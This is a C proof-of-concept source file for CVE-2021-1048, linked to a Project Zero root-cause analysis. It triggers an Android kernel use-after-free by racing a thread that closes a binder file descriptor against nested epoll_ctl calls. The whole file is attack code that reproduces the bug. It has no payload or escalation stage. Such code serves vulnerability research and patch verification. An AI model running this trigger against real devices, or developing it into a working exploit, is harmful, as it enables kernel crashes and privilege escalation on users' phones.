CVE-2021-1048.c

// https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <mqueue.h>
#include <pthread.h>
#include <stdbool.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/epoll.h>
#include <sys/resource.h>

#define DEBUG
#ifdef DEBUG
#define LOGV(...)                               \
    printf("[%s:%d] ", __FILE__, __LINE__);     \
    printf(__VA_ARGS__);                        \
    printf("\n");
#elif
#define LOGV(...)
#endif

#define MAXFDS 0x10

int target_efd = -1;
int binder_fds[MAXFDS];
bool ready = false;

void *racer(void *args) {
    while (!ready) { };
    close(binder_fds[8]);
    return NULL;
}

void make_epoll_ctl(int op, int fd, int target) {
    struct epoll_event events;
    memset(&events, 0, sizeof(events));
    events.events = EPOLLIN | EPOLLET;
    events.data.fd = target;
    if (epoll_ctl(fd, op, target, &events) < 0) {
        LOGV("epoll_ctl fail");
        perror("epoll_ctl");
        exit(-1);
    }
}

int main(int argc, char *argv[]) {
    int efd = epoll_create1(0);
    if (efd < 0) {
        LOGV("fail to create epfd");
        return -1;
    }

    LOGV("Trying EPOLL_CTL_ADD...");
    for (int i = 0; i < 0x10; i++) {
        binder_fds[i] = open("/dev/binder", O_RDWR);
        if (binder_fds[i] < 0) {
            LOGV("fail to open binder");
            return -1;
        }

        LOGV("loop : %d", i);
        make_epoll_ctl(EPOLL_CTL_ADD, efd, binder_fds[i]);
    }

    make_epoll_ctl(EPOLL_CTL_ADD, efd, epoll_create1(0));

    pthread_t thread;
    pthread_create(&thread, NULL, racer, NULL);
    LOGV("ready to race...");

    ready = true;
    make_epoll_ctl(EPOLL_CTL_ADD, epoll_create1(0), efd);
    pthread_join(thread, NULL);

    LOGV("wait...");
    getchar();
    return 0;
}